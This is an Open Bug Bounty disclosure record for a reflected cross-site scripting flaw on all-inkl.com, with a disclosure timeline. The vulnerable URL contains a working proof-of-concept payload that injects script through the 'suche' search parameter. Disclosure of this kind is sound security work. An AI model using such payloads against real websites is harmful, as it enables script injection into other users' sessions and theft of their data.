all-inkl.com XSS vulnerability

2017-01-25T22:09:00
ID OBB:209333
Type openbugbounty
Reporter Random_Robbie
Modified 2017-02-23T08:16:00

Description

Vulnerable URL:
https://all-inkl.com/wichtig/anleitungen/technik-stoerung/ping/domainerreichbarkeit-per-ping-testen/anleitung-ueber-windows-kommandozeile_111.html?suche=test%27"--!>confirm`OPENBUGBOUNTY`%3C/Script /K/>&textsuche;=ja
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 12058
VIP website status:| Yes
Check all-inkl.com SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 25 January, 2017 22:09 GMT
Vulnerability existence verified and confirmed| 26 January, 2017 08:05 GMT
Generic security notifications sent to website owner| 26 January, 2017 08:05 GMT
Notification sent to subscribers (without technical details)| 26 January, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 23 February, 2017 08:16 GMT